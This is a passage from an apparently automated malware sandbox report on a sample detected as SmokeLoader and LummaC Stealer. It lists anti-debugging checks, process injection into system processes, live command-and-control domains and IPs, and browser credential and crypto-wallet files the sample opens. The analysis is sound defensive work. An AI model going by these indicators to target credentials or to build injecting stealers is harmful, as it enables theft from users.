                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00456688 FindFirstFileExW,11_2_00456688
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0045673C FindFirstFileExW,FindNextFileW,FindClose,FindClose,11_2_0045673C
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior

                  Anti Debugging

                  barindex
                  Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F03B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,10_2_6F03B6C0
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0258C6BE push dword ptr fs:[00000030h]0_2_0258C6BE
                  Source: C:\Users\user\AppData\Roaming\wfshtitCode function: 7_2_0251B6FE push dword ptr fs:[00000030h]7_2_0251B6FE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00454295 mov eax, dword ptr fs:[00000030h]11_2_00454295
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043D47B mov eax, dword ptr fs:[00000030h]11_2_0043D47B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044861A mov ecx, dword ptr fs:[00000030h]11_2_0044861A
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F08948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6F08948B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042FB78 GetProcessHeap,GetProcessHeap,HeapAlloc,GetDIBits,ReleaseDC,HeapFree,GetObjectW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDC,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlFreeHeap,GetProcessHeap,11_2_0042FB78
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F08948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6F08948B
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F08B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6F08B144
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E949 SetUnhandledExceptionFilter,11_2_0043E949
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E955 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0043E955
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00452ABB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00452ABB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043EE60 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_0043EE60

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeDomain query: gudintas.at
                  Source: C:\Windows\explorer.exeDomain query: pik96.ru
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.59.14.90 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 172.67.171.76 443Jump to behavior
                  Source: C:\Windows\explorer.exeDomain query: h170811.srv22.test-hf.su
                  Source: C:\Windows\explorer.exeNetwork Connect: 175.126.109.15 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 189.232.58.103 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 193.149.185.139 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.40.39.251 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.171.233.129 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 211.104.254.139 80Jump to behavior
                  Source: C:\Windows\explorer.exeDomain query: kingpirate.ru
                  Source: C:\Windows\explorer.exeNetwork Connect: 186.13.17.220 80Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 91.227.16.22 80Jump to behavior
                  Benign windows process drops PE files
                  Source: C:\Windows\explorer.exeFile created: 46A3.exe.1.drJump to dropped file
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Allocates memory in foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 50119B0Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\wfshtitThread created: unknown EIP: 50419B0Jump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 463000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46F000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 472000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: B52008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 401000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 465000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 471000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 474000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: C00008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\BB04.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
                  Source: explorer.exe, 00000001.00000000.897239807.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                  Source: explorer.exe, 00000001.00000000.897626387.0000000005AA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.897755386.0000000009E75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.897239807.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000001.00000000.897239807.0000000001370000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000001.00000000.897206357.0000000000E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman4
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeQueries volume information: C:\Users\user\AppData\Local\Temp\46A3.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F0884B0 cpuid 10_2_6F0884B0
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\46A3.exeCode function: 10_2_6F08A25A GetSystemTimeAsFileTime,__aulldiv,10_2_6F08A25A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00458344 GetTimeZoneInformation,11_2_00458344

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.984079448.0000000003A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1050418259.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4268, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: AppLaunch.exe PID: 7108, type: MEMORYSTR
                  Yara detected SmokeLoader
                  Source: Yara matchFile source: 0.2.file.exe.23f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.3.wfshtit.2400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.wfshtit.23f0e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.wfshtit.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.file.exe.2400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.951709724.0000000002431000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.886072573.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000003.940635525.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.951699501.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.899710325.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.899739765.0000000002421000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Found many strings related to Crypto-Wallets (likely being stolen)
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000E95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                  Source: RegAsm.exe, 0000000B.00000002.1051024783.000000000341B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Chrome/Default/Extensions/Jaxx LibertyR
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "p": "%appdata%\\Exodus\\exodus.wallet",
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000E95000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                  Source: RegAsm.exe, 0000000B.00000002.1050683649.0000000000EE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000005.ldbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG.oldJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000008.logJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
